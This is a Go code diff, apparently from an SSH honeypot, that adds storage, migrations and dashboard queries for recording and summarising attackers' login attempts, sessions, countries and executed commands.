sess.EventCount = eventCounts[s.ID]
sess.InputBytes = inputBytes[s.ID]
sessions = append(sessions, sess)
}
if f.SortBy == "input_bytes" {
sort.Slice(sessions, func(i, j int) bool {
return sessions[i].InputBytes > sessions[j].InputBytes
})
} else {
sort.Slice(sessions, func(i, j int) bool {
return sessions[i].ConnectedAt.After(sessions[j].ConnectedAt)
})
}
if limit > 0 && len(sessions) > limit {
sessions = sessions[:limit]
}
return sessions
}
// matchesSessionFilter returns true if the session matches the given filter.
func matchesSessionFilter(s *Session, f DashboardFilter) bool {
if f.Since != nil && s.ConnectedAt.Before(*f.Since) {
return false
}
if f.Until != nil && s.ConnectedAt.After(*f.Until) {
return false
}
if f.IP != "" && s.IP != f.IP {
return false
}
if f.Country != "" && s.Country != f.Country {
return false
}
if f.Username != "" && s.Username != f.Username {
return false
}
if f.HumanScoreAboveZero {
if s.HumanScore == nil || *s.HumanScore <= 0 {
return false
}
}
return true
}
func (m *MemoryStore) GetTopExecCommands(_ context.Context, limit int) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
counts := make(map[string]int64)
for _, s := range m.Sessions {
if s.ExecCommand != nil {
counts[*s.ExecCommand]++
}
}
entries := make([]TopEntry, 0, len(counts))
for k, v := range counts {
entries = append(entries, TopEntry{Value: k, Count: v})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries, nil
}
func (m *MemoryStore) CloseActiveSessions(_ context.Context, disconnectedAt time.Time) (int64, error) {
m.mu.Lock()
defer m.mu.Unlock()
var count int64
t := disconnectedAt.UTC()
for _, s := range m.Sessions {
if s.DisconnectedAt == nil {
s.DisconnectedAt = &t
count++
}
}
return count, nil
}
func (m *MemoryStore) GetAttemptsOverTime(_ context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error) {
m.mu.Lock()
defer m.mu.Unlock()
var cutoff time.Time
if since != nil {
cutoff = *since
} else {
cutoff = time.Now().UTC().AddDate(0, 0, -days)
}
counts := make(map[string]int64)
for _, a := range m.LoginAttempts {
if a.LastSeen.Before(cutoff) {
continue
}
if until != nil && a.LastSeen.After(*until) {
continue
}
day := a.LastSeen.Format("2006-01-02")
counts[day] += int64(a.Count)
}
points := make([]TimeSeriesPoint, 0, len(counts))
for day, count := range counts {
t, _ := time.Parse("2006-01-02", day)
points = append(points, TimeSeriesPoint{Timestamp: t, Count: count})
}
sort.Slice(points, func(i, j int) bool {
return points[i].Timestamp.Before(points[j].Timestamp)
})
return points, nil
}
func (m *MemoryStore) GetHourlyPattern(_ context.Context, since, until *time.Time) ([]HourlyCount, error) {
m.mu.Lock()
defer m.mu.Unlock()
hourCounts := make(map[int]int64)
for _, a := range m.LoginAttempts {
if since != nil && a.LastSeen.Before(*since) {
continue
}
if until != nil && a.LastSeen.After(*until) {
continue
}
hour := a.LastSeen.Hour()
hourCounts[hour] += int64(a.Count)
}
counts := make([]HourlyCount, 0, len(hourCounts))
for h, c := range hourCounts {
counts = append(counts, HourlyCount{Hour: h, Count: c})
}
sort.Slice(counts, func(i, j int) bool {
return counts[i].Hour < counts[j].Hour
})
return counts, nil
}
func (m *MemoryStore) GetCountryStats(_ context.Context) ([]CountryCount, error) {
m.mu.Lock()
defer m.mu.Unlock()
counts := make(map[string]int64)
for _, a := range m.LoginAttempts {
if a.Country == "" {
continue
}
counts[a.Country] += int64(a.Count)
}
result := make([]CountryCount, 0, len(counts))
for country, count := range counts {
result = append(result, CountryCount{Country: country, Count: count})
}
sort.Slice(result, func(i, j int) bool {
return result[i].Count > result[j].Count
})
return result, nil
}
// matchesFilter returns true if the login attempt matches the given filter. Must be called with m.mu held.
func matchesFilter(a *LoginAttempt, f DashboardFilter) bool {
if f.Since != nil && a.LastSeen.Before(*f.Since) {
return false
}
if f.Until != nil && a.LastSeen.After(*f.Until) {
return false
}
if f.IP != "" && a.IP != f.IP {
return false
}
if f.Country != "" && a.Country != f.Country {
return false
}
if f.Username != "" && a.Username != f.Username {
return false
}
return true
}
func (m *MemoryStore) GetFilteredDashboardStats(_ context.Context, f DashboardFilter) (*DashboardStats, error) {
m.mu.Lock()
defer m.mu.Unlock()
stats := &DashboardStats{}
ips := make(map[string]struct{})
for i := range m.LoginAttempts {
a := &m.LoginAttempts[i]
if !matchesFilter(a, f) {
continue
}
stats.TotalAttempts += int64(a.Count)
ips[a.IP] = struct{}{}
}
stats.UniqueIPs = int64(len(ips))
for _, s := range m.Sessions {
if f.Since != nil && s.ConnectedAt.Before(*f.Since) {
continue
}
if f.Until != nil && s.ConnectedAt.After(*f.Until) {
continue
}
if f.IP != "" && s.IP != f.IP {
continue
}
if f.Country != "" && s.Country != f.Country {
continue
}
stats.TotalSessions++
if s.DisconnectedAt == nil {
stats.ActiveSessions++
}
}
return stats, nil
}
func (m *MemoryStore) GetFilteredTopUsernames(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
return m.filteredTopN("username", limit, f), nil
}
func (m *MemoryStore) GetFilteredTopPasswords(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
return m.filteredTopN("password", limit, f), nil
}
func (m *MemoryStore) GetFilteredTopIPs(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
type ipInfo struct {
count int64
country string
}
agg := make(map[string]*ipInfo)
for i := range m.LoginAttempts {
a := &m.LoginAttempts[i]
if !matchesFilter(a, f) {
continue
}
info, ok := agg[a.IP]
if !ok {
info = &ipInfo{}
agg[a.IP] = info
}
info.count += int64(a.Count)
if a.Country != "" {
info.country = a.Country
}
}
entries := make([]TopEntry, 0, len(agg))
for ip, info := range agg {
entries = append(entries, TopEntry{Value: ip, Country: info.country, Count: info.count})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries, nil
}
func (m *MemoryStore) GetFilteredTopCountries(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
counts := make(map[string]int64)
for i := range m.LoginAttempts {
a := &m.LoginAttempts[i]
if a.Country == "" {
continue
}
if !matchesFilter(a, f) {
continue
}
counts[a.Country] += int64(a.Count)
}
entries := make([]TopEntry, 0, len(counts))
for k, v := range counts {
entries = append(entries, TopEntry{Value: k, Count: v})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries, nil
}
// filteredTopN aggregates login attempts by the given field with filter applied and returns the top N. Must be called with m.mu held.
func (m *MemoryStore) filteredTopN(field string, limit int, f DashboardFilter) []TopEntry {
counts := make(map[string]int64)
for i := range m.LoginAttempts {
a := &m.LoginAttempts[i]
if !matchesFilter(a, f) {
continue
}
var key string
switch field {
case "username":
key = a.Username
case "password":
key = a.Password
case "ip":
key = a.IP
}
counts[key] += int64(a.Count)
}
entries := make([]TopEntry, 0, len(counts))
for k, v := range counts {
entries = append(entries, TopEntry{Value: k, Count: v})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries
}
func (m *MemoryStore) Close() error { func (m *MemoryStore) Close() error {
return nil return nil
} }

View File

@@ -0,0 +1,9 @@
CREATE TABLE session_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
session_id TEXT NOT NULL REFERENCES sessions(id) ON DELETE CASCADE,
timestamp TEXT NOT NULL,
direction INTEGER NOT NULL,
data BLOB NOT NULL
);
CREATE INDEX idx_session_events_session_id ON session_events(session_id);

View File

@@ -0,0 +1,3 @@
ALTER TABLE login_attempts ADD COLUMN country TEXT NOT NULL DEFAULT '';
ALTER TABLE sessions ADD COLUMN country TEXT NOT NULL DEFAULT '';
CREATE INDEX idx_login_attempts_country ON login_attempts(country);

View File

@@ -0,0 +1 @@
ALTER TABLE sessions ADD COLUMN exec_command TEXT;

View File

@@ -0,0 +1,3 @@
CREATE INDEX idx_login_attempts_username ON login_attempts(username);
CREATE INDEX idx_login_attempts_password ON login_attempts(password);
CREATE INDEX idx_sessions_disconnected_at ON sessions(disconnected_at);

View File

@@ -25,8 +25,8 @@ func TestMigrateCreatesTablesAndVersion(t *testing.T) {
if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil { if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil {
t.Fatalf("query version: %v", err) t.Fatalf("query version: %v", err)
} }
if version != 1 { if version != 5 {
t.Errorf("version = %d, want 1", version) t.Errorf("version = %d, want 5", version)
} }
// Verify tables exist by inserting into them. // Verify tables exist by inserting into them.
@@ -64,8 +64,8 @@ func TestMigrateIdempotent(t *testing.T) {
if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil { if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil {
t.Fatalf("query version: %v", err) t.Fatalf("query version: %v", err)
} }
if version != 1 { if version != 5 {
t.Errorf("version = %d after double migrate, want 1", version) t.Errorf("version = %d after double migrate, want 5", version)
} }
} }

View File

@@ -22,7 +22,7 @@ func TestRunRetentionDeletesOldRecords(t *testing.T) {
} }
// Insert a recent login attempt. // Insert a recent login attempt.
if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2"); err != nil { if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2", ""); err != nil {
t.Fatalf("insert recent attempt: %v", err) t.Fatalf("insert recent attempt: %v", err)
} }

View File

@@ -4,6 +4,7 @@ import (
"context" "context"
"database/sql" "database/sql"
"fmt" "fmt"
"strings"
"time" "time"
"github.com/google/uuid" "github.com/google/uuid"
@@ -34,28 +35,29 @@ func NewSQLiteStore(dbPath string) (*SQLiteStore, error) {
return &SQLiteStore{db: db}, nil return &SQLiteStore{db: db}, nil
} }
func (s *SQLiteStore) RecordLoginAttempt(ctx context.Context, username, password, ip string) error { func (s *SQLiteStore) RecordLoginAttempt(ctx context.Context, username, password, ip, country string) error {
now := time.Now().UTC().Format(time.RFC3339) now := time.Now().UTC().Format(time.RFC3339)
_, err := s.db.ExecContext(ctx, ` _, err := s.db.ExecContext(ctx, `
INSERT INTO login_attempts (username, password, ip, count, first_seen, last_seen) INSERT INTO login_attempts (username, password, ip, country, count, first_seen, last_seen)
VALUES (?, ?, ?, 1, ?, ?) VALUES (?, ?, ?, ?, 1, ?, ?)
ON CONFLICT(username, password, ip) DO UPDATE SET ON CONFLICT(username, password, ip) DO UPDATE SET
count = count + 1, count = count + 1,
last_seen = ?`, last_seen = ?,
username, password, ip, now, now, now) country = ?`,
username, password, ip, country, now, now, now, country)
if err != nil { if err != nil {
return fmt.Errorf("recording login attempt: %w", err) return fmt.Errorf("recording login attempt: %w", err)
} }
return nil return nil
} }
func (s *SQLiteStore) CreateSession(ctx context.Context, ip, username, shellName string) (string, error) { func (s *SQLiteStore) CreateSession(ctx context.Context, ip, username, shellName, country string) (string, error) {
id := uuid.New().String() id := uuid.New().String()
now := time.Now().UTC().Format(time.RFC3339) now := time.Now().UTC().Format(time.RFC3339)
_, err := s.db.ExecContext(ctx, ` _, err := s.db.ExecContext(ctx, `
INSERT INTO sessions (id, ip, username, shell_name, connected_at) INSERT INTO sessions (id, ip, username, shell_name, country, connected_at)
VALUES (?, ?, ?, ?, ?)`, VALUES (?, ?, ?, ?, ?, ?)`,
id, ip, username, shellName, now) id, ip, username, shellName, country, now)
if err != nil { if err != nil {
return "", fmt.Errorf("creating session: %w", err) return "", fmt.Errorf("creating session: %w", err)
} }
@@ -82,6 +84,16 @@ func (s *SQLiteStore) UpdateHumanScore(ctx context.Context, sessionID string, sc
return nil return nil
} }
func (s *SQLiteStore) SetExecCommand(ctx context.Context, sessionID string, command string) error {
_, err := s.db.ExecContext(ctx, `
UPDATE sessions SET exec_command = ? WHERE id = ?`,
command, sessionID)
if err != nil {
return fmt.Errorf("setting exec command: %w", err)
}
return nil
}
func (s *SQLiteStore) AppendSessionLog(ctx context.Context, sessionID, input, output string) error { func (s *SQLiteStore) AppendSessionLog(ctx context.Context, sessionID, input, output string) error {
now := time.Now().UTC().Format(time.RFC3339) now := time.Now().UTC().Format(time.RFC3339)
_, err := s.db.ExecContext(ctx, ` _, err := s.db.ExecContext(ctx, `
@@ -94,6 +106,115 @@ func (s *SQLiteStore) AppendSessionLog(ctx context.Context, sessionID, input, ou
return nil return nil
} }
func (s *SQLiteStore) GetSession(ctx context.Context, sessionID string) (*Session, error) {
var sess Session
var connectedAt string
var disconnectedAt sql.NullString
var humanScore sql.NullFloat64
var execCommand sql.NullString
err := s.db.QueryRowContext(ctx, `
SELECT id, ip, country, username, shell_name, connected_at, disconnected_at, human_score, exec_command
FROM sessions WHERE id = ?`, sessionID).Scan(
&sess.ID, &sess.IP, &sess.Country, &sess.Username, &sess.ShellName,
&connectedAt, &disconnectedAt, &humanScore, &execCommand,
)
if err == sql.ErrNoRows {
return nil, nil
}
if err != nil {
return nil, fmt.Errorf("querying session: %w", err)
}
sess.ConnectedAt, _ = time.Parse(time.RFC3339, connectedAt)
if disconnectedAt.Valid {
t, _ := time.Parse(time.RFC3339, disconnectedAt.String)
sess.DisconnectedAt = &t
}
if humanScore.Valid {
sess.HumanScore = &humanScore.Float64
}
if execCommand.Valid {
sess.ExecCommand = &execCommand.String
}
return &sess, nil
}
func (s *SQLiteStore) GetSessionLogs(ctx context.Context, sessionID string) ([]SessionLog, error) {
rows, err := s.db.QueryContext(ctx, `
SELECT id, session_id, timestamp, input, output
FROM session_logs WHERE session_id = ?
ORDER BY timestamp`, sessionID)
if err != nil {
return nil, fmt.Errorf("querying session logs: %w", err)
}
defer func() { _ = rows.Close() }()
var logs []SessionLog
for rows.Next() {
var l SessionLog
var ts string
if err := rows.Scan(&l.ID, &l.SessionID, &ts, &l.Input, &l.Output); err != nil {
return nil, fmt.Errorf("scanning session log: %w", err)
}
l.Timestamp, _ = time.Parse(time.RFC3339, ts)
logs = append(logs, l)
}
return logs, rows.Err()
}
func (s *SQLiteStore) AppendSessionEvents(ctx context.Context, events []SessionEvent) error {
if len(events) == 0 {
return nil
}
tx, err := s.db.BeginTx(ctx, nil)
if err != nil {
return fmt.Errorf("begin transaction: %w", err)
}
defer tx.Rollback()
stmt, err := tx.PrepareContext(ctx, `
INSERT INTO session_events (session_id, timestamp, direction, data)
VALUES (?, ?, ?, ?)`)
if err != nil {
return fmt.Errorf("preparing statement: %w", err)
}
defer stmt.Close()
for _, e := range events {
_, err := stmt.ExecContext(ctx, e.SessionID, e.Timestamp.UTC().Format(time.RFC3339Nano), e.Direction, e.Data)
if err != nil {
return fmt.Errorf("inserting session event: %w", err)
}
}
return tx.Commit()
}
func (s *SQLiteStore) GetSessionEvents(ctx context.Context, sessionID string) ([]SessionEvent, error) {
rows, err := s.db.QueryContext(ctx, `
SELECT session_id, timestamp, direction, data
FROM session_events WHERE session_id = ?
ORDER BY id`, sessionID)
if err != nil {
return nil, fmt.Errorf("querying session events: %w", err)
}
defer func() { _ = rows.Close() }()
var events []SessionEvent
for rows.Next() {
var e SessionEvent
var ts string
if err := rows.Scan(&e.SessionID, &ts, &e.Direction, &e.Data); err != nil {
return nil, fmt.Errorf("scanning session event: %w", err)
}
e.Timestamp, _ = time.Parse(time.RFC3339Nano, ts)
events = append(events, e)
}
return events, rows.Err()
}
func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) { func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
cutoffStr := cutoff.UTC().Format(time.RFC3339) cutoffStr := cutoff.UTC().Format(time.RFC3339)
@@ -105,15 +226,26 @@ func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time)
var total int64 var total int64
// Delete session logs for old sessions. // Delete session events for old sessions.
res, err := tx.ExecContext(ctx, ` res, err := tx.ExecContext(ctx, `
DELETE FROM session_events WHERE session_id IN (
SELECT id FROM sessions WHERE connected_at < ?
)`, cutoffStr)
if err != nil {
return 0, fmt.Errorf("deleting session events: %w", err)
}
n, _ := res.RowsAffected()
total += n
// Delete session logs for old sessions.
res, err = tx.ExecContext(ctx, `
DELETE FROM session_logs WHERE session_id IN ( DELETE FROM session_logs WHERE session_id IN (
SELECT id FROM sessions WHERE connected_at < ? SELECT id FROM sessions WHERE connected_at < ?
)`, cutoffStr) )`, cutoffStr)
if err != nil { if err != nil {
return 0, fmt.Errorf("deleting session logs: %w", err) return 0, fmt.Errorf("deleting session logs: %w", err)
} }
n, _ := res.RowsAffected() n, _ = res.RowsAffected()
total += n total += n
// Delete old sessions. // Delete old sessions.
@@ -139,6 +271,513 @@ func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time)
return total, nil return total, nil
} }
func (s *SQLiteStore) GetDashboardStats(ctx context.Context) (*DashboardStats, error) {
stats := &DashboardStats{}
err := s.db.QueryRowContext(ctx, `
SELECT COALESCE(SUM(count), 0), COUNT(DISTINCT ip)
FROM login_attempts`).Scan(&stats.TotalAttempts, &stats.UniqueIPs)
if err != nil {
return nil, fmt.Errorf("querying attempt stats: %w", err)
}
err = s.db.QueryRowContext(ctx, `SELECT COUNT(*) FROM sessions`).Scan(&stats.TotalSessions)
if err != nil {
return nil, fmt.Errorf("querying total sessions: %w", err)
}
err = s.db.QueryRowContext(ctx, `
SELECT COUNT(*) FROM sessions WHERE disconnected_at IS NULL`).Scan(&stats.ActiveSessions)
if err != nil {
return nil, fmt.Errorf("querying active sessions: %w", err)
}
return stats, nil
}
func (s *SQLiteStore) GetTopUsernames(ctx context.Context, limit int) ([]TopEntry, error) {
return s.queryTopN(ctx, "username", limit)
}
func (s *SQLiteStore) GetTopPasswords(ctx context.Context, limit int) ([]TopEntry, error) {
return s.queryTopN(ctx, "password", limit)
}
func (s *SQLiteStore) GetTopIPs(ctx context.Context, limit int) ([]TopEntry, error) {
rows, err := s.db.QueryContext(ctx, `
SELECT ip, country, SUM(count) AS total
FROM login_attempts
GROUP BY ip
ORDER BY total DESC
LIMIT ?`, limit)
if err != nil {
return nil, fmt.Errorf("querying top IPs: %w", err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Country, &e.Count); err != nil {
return nil, fmt.Errorf("scanning top IPs: %w", err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) GetTopCountries(ctx context.Context, limit int) ([]TopEntry, error) {
rows, err := s.db.QueryContext(ctx, `
SELECT country, SUM(count) AS total
FROM login_attempts
WHERE country != ''
GROUP BY country
ORDER BY total DESC
LIMIT ?`, limit)
if err != nil {
return nil, fmt.Errorf("querying top countries: %w", err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Count); err != nil {
return nil, fmt.Errorf("scanning top countries: %w", err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) queryTopN(ctx context.Context, column string, limit int) ([]TopEntry, error) {
switch column {
case "username", "password", "ip":
// valid columns
default:
return nil, fmt.Errorf("invalid column: %s", column)
}
query := fmt.Sprintf(`
SELECT %s, SUM(count) AS total
FROM login_attempts
GROUP BY %s
ORDER BY total DESC
LIMIT ?`, column, column)
rows, err := s.db.QueryContext(ctx, query, limit)
if err != nil {
return nil, fmt.Errorf("querying top %s: %w", column, err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Count); err != nil {
return nil, fmt.Errorf("scanning top %s: %w", column, err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) GetRecentSessions(ctx context.Context, limit int, activeOnly bool) ([]Session, error) {
query := `SELECT s.id, s.ip, s.country, s.username, s.shell_name, s.connected_at, s.disconnected_at, s.human_score, s.exec_command, COUNT(e.id) as event_count, COALESCE(SUM(CASE WHEN e.direction = 0 THEN LENGTH(e.data) ELSE 0 END), 0) as input_bytes FROM sessions s LEFT JOIN session_events e ON s.id = e.session_id`
if activeOnly {
query += ` WHERE s.disconnected_at IS NULL`
}
query += ` GROUP BY s.id ORDER BY s.connected_at DESC LIMIT ?`
return s.scanSessions(ctx, query, limit)
}
// buildSessionWhereClause builds a dynamic WHERE clause for session filtering.
func buildSessionWhereClause(f DashboardFilter, activeOnly bool) (string, []any) {
var clauses []string
var args []any
if activeOnly {
clauses = append(clauses, "s.disconnected_at IS NULL")
}
if f.Since != nil {
clauses = append(clauses, "s.connected_at >= ?")
args = append(args, f.Since.UTC().Format(time.RFC3339))
}
if f.Until != nil {
clauses = append(clauses, "s.connected_at <= ?")
args = append(args, f.Until.UTC().Format(time.RFC3339))
}
if f.IP != "" {
clauses = append(clauses, "s.ip = ?")
args = append(args, f.IP)
}
if f.Country != "" {
clauses = append(clauses, "s.country = ?")
args = append(args, f.Country)
}
if f.Username != "" {
clauses = append(clauses, "s.username = ?")
args = append(args, f.Username)
}
if f.HumanScoreAboveZero {
clauses = append(clauses, "s.human_score > 0")
}
if len(clauses) == 0 {
return "", nil
}
return " WHERE " + strings.Join(clauses, " AND "), args
}
// validSessionSorts maps allowed SortBy values to SQL ORDER BY clauses.
var validSessionSorts = map[string]string{
"connected_at": "s.connected_at DESC",
"input_bytes": "input_bytes DESC",
}
func (s *SQLiteStore) GetFilteredSessions(ctx context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error) {
where, args := buildSessionWhereClause(f, activeOnly)
args = append(args, limit)
orderBy := validSessionSorts["connected_at"]
if mapped, ok := validSessionSorts[f.SortBy]; ok {
orderBy = mapped
}
//nolint:gosec // where/order clauses built from allowlisted constants, not raw user input
query := `SELECT s.id, s.ip, s.country, s.username, s.shell_name, s.connected_at, s.disconnected_at, s.human_score, s.exec_command, COUNT(e.id) as event_count, COALESCE(SUM(CASE WHEN e.direction = 0 THEN LENGTH(e.data) ELSE 0 END), 0) as input_bytes FROM sessions s LEFT JOIN session_events e ON s.id = e.session_id` + where + ` GROUP BY s.id ORDER BY ` + orderBy + ` LIMIT ?`
return s.scanSessions(ctx, query, args...)
}
// scanSessions executes a session query and scans the results.
func (s *SQLiteStore) scanSessions(ctx context.Context, query string, args ...any) ([]Session, error) {
rows, err := s.db.QueryContext(ctx, query, args...)
if err != nil {
return nil, fmt.Errorf("querying sessions: %w", err)
}
defer func() { _ = rows.Close() }()
var sessions []Session
for rows.Next() {
var sess Session
var connectedAt string
var disconnectedAt sql.NullString
var humanScore sql.NullFloat64
var execCommand sql.NullString
if err := rows.Scan(&sess.ID, &sess.IP, &sess.Country, &sess.Username, &sess.ShellName, &connectedAt, &disconnectedAt, &humanScore, &execCommand, &sess.EventCount, &sess.InputBytes); err != nil {
return nil, fmt.Errorf("scanning session: %w", err)
}
sess.ConnectedAt, _ = time.Parse(time.RFC3339, connectedAt)
if disconnectedAt.Valid {
t, _ := time.Parse(time.RFC3339, disconnectedAt.String)
sess.DisconnectedAt = &t
}
if humanScore.Valid {
sess.HumanScore = &humanScore.Float64
}
if execCommand.Valid {
sess.ExecCommand = &execCommand.String
}
sessions = append(sessions, sess)
}
return sessions, rows.Err()
}
func (s *SQLiteStore) GetTopExecCommands(ctx context.Context, limit int) ([]TopEntry, error) {
rows, err := s.db.QueryContext(ctx, `
SELECT exec_command, COUNT(*) as total
FROM sessions
WHERE exec_command IS NOT NULL
GROUP BY exec_command
ORDER BY total DESC
LIMIT ?`, limit)
if err != nil {
return nil, fmt.Errorf("querying top exec commands: %w", err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Count); err != nil {
return nil, fmt.Errorf("scanning top exec commands: %w", err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) CloseActiveSessions(ctx context.Context, disconnectedAt time.Time) (int64, error) {
res, err := s.db.ExecContext(ctx, `
UPDATE sessions SET disconnected_at = ? WHERE disconnected_at IS NULL`,
disconnectedAt.UTC().Format(time.RFC3339))
if err != nil {
return 0, fmt.Errorf("closing active sessions: %w", err)
}
return res.RowsAffected()
}
func (s *SQLiteStore) GetAttemptsOverTime(ctx context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error) {
query := `SELECT DATE(last_seen) AS d, SUM(count) FROM login_attempts WHERE 1=1`
var args []any
if since != nil {
query += ` AND last_seen >= ?`
args = append(args, since.UTC().Format(time.RFC3339))
} else {
query += ` AND last_seen >= ?`
args = append(args, time.Now().UTC().AddDate(0, 0, -days).Format("2006-01-02"))
}
if until != nil {
query += ` AND last_seen <= ?`
args = append(args, until.UTC().Format(time.RFC3339))
}
query += ` GROUP BY d ORDER BY d`
rows, err := s.db.QueryContext(ctx, query, args...)
if err != nil {
return nil, fmt.Errorf("querying attempts over time: %w", err)
}
defer func() { _ = rows.Close() }()
var points []TimeSeriesPoint
for rows.Next() {
var dateStr string
var p TimeSeriesPoint
if err := rows.Scan(&dateStr, &p.Count); err != nil {
return nil, fmt.Errorf("scanning time series point: %w", err)
}
p.Timestamp, _ = time.Parse("2006-01-02", dateStr)
points = append(points, p)
}
return points, rows.Err()
}
func (s *SQLiteStore) GetHourlyPattern(ctx context.Context, since, until *time.Time) ([]HourlyCount, error) {
query := `SELECT CAST(STRFTIME('%H', last_seen) AS INTEGER) AS h, SUM(count) FROM login_attempts WHERE 1=1`
var args []any
if since != nil {
query += ` AND last_seen >= ?`
args = append(args, since.UTC().Format(time.RFC3339))
}
if until != nil {
query += ` AND last_seen <= ?`
args = append(args, until.UTC().Format(time.RFC3339))
}
query += ` GROUP BY h ORDER BY h`
rows, err := s.db.QueryContext(ctx, query, args...)
if err != nil {
return nil, fmt.Errorf("querying hourly pattern: %w", err)
}
defer func() { _ = rows.Close() }()
var counts []HourlyCount
for rows.Next() {
var c HourlyCount
if err := rows.Scan(&c.Hour, &c.Count); err != nil {
return nil, fmt.Errorf("scanning hourly count: %w", err)
}
counts = append(counts, c)
}
return counts, rows.Err()
}
func (s *SQLiteStore) GetCountryStats(ctx context.Context) ([]CountryCount, error) {
rows, err := s.db.QueryContext(ctx, `
SELECT country, SUM(count) AS total
FROM login_attempts
WHERE country != ''
GROUP BY country
ORDER BY total DESC`)
if err != nil {
return nil, fmt.Errorf("querying country stats: %w", err)
}
defer func() { _ = rows.Close() }()
var counts []CountryCount
for rows.Next() {
var c CountryCount
if err := rows.Scan(&c.Country, &c.Count); err != nil {
return nil, fmt.Errorf("scanning country count: %w", err)
}
counts = append(counts, c)
}
return counts, rows.Err()
}
// buildAttemptWhereClause builds a dynamic WHERE clause for login_attempts filtering.
func buildAttemptWhereClause(f DashboardFilter) (string, []any) {
var clauses []string
var args []any
if f.Since != nil {
clauses = append(clauses, "last_seen >= ?")
args = append(args, f.Since.UTC().Format(time.RFC3339))
}
if f.Until != nil {
clauses = append(clauses, "last_seen <= ?")
args = append(args, f.Until.UTC().Format(time.RFC3339))
}
if f.IP != "" {
clauses = append(clauses, "ip = ?")
args = append(args, f.IP)
}
if f.Country != "" {
clauses = append(clauses, "country = ?")
args = append(args, f.Country)
}
if f.Username != "" {
clauses = append(clauses, "username = ?")
args = append(args, f.Username)
}
if len(clauses) == 0 {
return "", nil
}
return " WHERE " + strings.Join(clauses, " AND "), args
}
func (s *SQLiteStore) GetFilteredDashboardStats(ctx context.Context, f DashboardFilter) (*DashboardStats, error) {
where, args := buildAttemptWhereClause(f)
stats := &DashboardStats{}
err := s.db.QueryRowContext(ctx,
`SELECT COALESCE(SUM(count), 0), COUNT(DISTINCT ip) FROM login_attempts`+where, args...).
Scan(&stats.TotalAttempts, &stats.UniqueIPs)
if err != nil {
return nil, fmt.Errorf("querying filtered attempt stats: %w", err)
}
// Sessions don't have username/password, so only filter by time, IP, country.
sessQuery := `SELECT COUNT(*) FROM sessions WHERE 1=1`
var sessArgs []any
if f.Since != nil {
sessQuery += ` AND connected_at >= ?`
sessArgs = append(sessArgs, f.Since.UTC().Format(time.RFC3339))
}
if f.Until != nil {
sessQuery += ` AND connected_at <= ?`
sessArgs = append(sessArgs, f.Until.UTC().Format(time.RFC3339))
}
if f.IP != "" {
sessQuery += ` AND ip = ?`
sessArgs = append(sessArgs, f.IP)
}
if f.Country != "" {
sessQuery += ` AND country = ?`
sessArgs = append(sessArgs, f.Country)
}
err = s.db.QueryRowContext(ctx, sessQuery, sessArgs...).Scan(&stats.TotalSessions)
if err != nil {
return nil, fmt.Errorf("querying filtered total sessions: %w", err)
}
err = s.db.QueryRowContext(ctx, sessQuery+` AND disconnected_at IS NULL`, sessArgs...).Scan(&stats.ActiveSessions)
if err != nil {
return nil, fmt.Errorf("querying filtered active sessions: %w", err)
}
return stats, nil
}
func (s *SQLiteStore) GetFilteredTopUsernames(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
return s.queryFilteredTopN(ctx, "username", limit, f)
}
func (s *SQLiteStore) GetFilteredTopPasswords(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
return s.queryFilteredTopN(ctx, "password", limit, f)
}
func (s *SQLiteStore) GetFilteredTopIPs(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
where, args := buildAttemptWhereClause(f)
args = append(args, limit)
//nolint:gosec // where clause built from trusted constants, not user input
query := `SELECT ip, country, SUM(count) AS total FROM login_attempts` + where + ` GROUP BY ip ORDER BY total DESC LIMIT ?`
rows, err := s.db.QueryContext(ctx, query, args...)
if err != nil {
